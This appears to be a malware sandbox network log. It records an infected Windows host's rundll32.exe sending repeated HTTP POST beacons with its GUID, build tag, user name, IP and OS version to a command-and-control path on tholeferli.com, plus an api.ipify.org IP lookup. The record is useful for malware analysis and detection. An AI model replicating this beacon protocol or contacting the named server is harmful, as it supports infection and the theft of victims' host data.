                                                Session ID: 38 | Source IP: 192.168.2.22 | Source Port: 49205 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:24.952299118 CEST | kBytes transferred: 338 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:25.108439922 CEST | kBytes transferred: 338 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): GZATARRABw==


                                                Session ID: 39 | Source IP: 192.168.2.22 | Source Port: 49206 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:25.390419006 CEST | kBytes transferred: 339 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:25.547324896 CEST | kBytes transferred: 339 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): CKPXARRABw==


                                                Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49171 | Destination IP: 50.16.239.65 | Destination Port: 80 | Process: C:\Windows\SysWOW64\svchost.exe
                                                Timestamp: Jul 22, 2021 16:11:06.081828117 CEST | kBytes transferred: 293 | Direction: OUT | Data: GET /?format=xml HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                Jul 22, 2021 16:11:06.266412020 CEST | 295 | IN | HTTP/1.1 200 OK
                                                Server: Cowboy
                                                Connection: keep-alive
                                                Content-Type: text/plain
                                                Vary: Origin
                                                Date: Thu, 22 Jul 2021 14:11:06 GMT
                                                Content-Length: 10
                                                Via: 1.1 vegur
                                                Data Raw: 38 34 2e 31 37 2e 35 32 2e 38
                                                Data Ascii: 84.17.52.8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                40 | 192.168.2.22 | 49207 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:25.845089912 CEST | 340 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:26.011414051 CEST | 340 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:25 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 48 53 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJHSQARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                41 | 192.168.2.22 | 49208 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:26.291963100 CEST | 341 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:26.458389997 CEST | 341 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 42 59 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGBYTARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                42 | 192.168.2.22 | 49209 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:26.742439032 CEST | 342 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:26.898808002 CEST | 342 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:26 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVJQEARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                43 | 192.168.2.22 | 49210 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:27.191701889 CEST | 343 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:27.347398996 CEST | 344 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJGTQARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                44 | 192.168.2.22 | 49211 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:27.621886015 CEST | 344 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:27.777520895 CEST | 345 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:27 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                45 | 192.168.2.22 | 49212 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:28.069185972 CEST | 345 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:28.217291117 CEST | 346 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBJQYARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                46 | 192.168.2.22 | 49213 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:28.501733065 CEST | 347 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:28.671717882 CEST | 347 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 54 47 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGTGTARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                47 | 192.168.2.22 | 49214 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:28.951314926 CEST | 348 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:29.115489960 CEST | 348 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:28 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFGTUARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                48 | 192.168.2.22 | 49215 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:29.400058031 CEST | 349 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:29.557709932 CEST | 349 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4b 50 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYKPBARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                49 | 192.168.2.22 | 49216 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:29.838335991 CEST | 350 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:29.991446972 CEST | 350 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:29 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNMNMARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                5 | 192.168.2.22 | 49172 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:06.085464954 CEST | 294 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:06.253609896 CEST | 294 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:06 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 4e 4d 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQNMJARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                50 | 192.168.2.22 | 49217 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:30.272991896 CEST | 351 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:30.440629005 CEST | 351 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVYBEARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                51 | 192.168.2.22 | 49218 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:30.829647064 CEST | 352 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:30.989835024 CEST | 352 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:30 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZQJAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                52 | 192.168.2.22 | 49219 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:31.273880959 CEST | 353 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:32.441133976 CEST | 354 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:32 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNBYMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.2.22 | 49220 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:32.852581978 CEST | 354 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: tholeferli.com
    Content-Length: 110
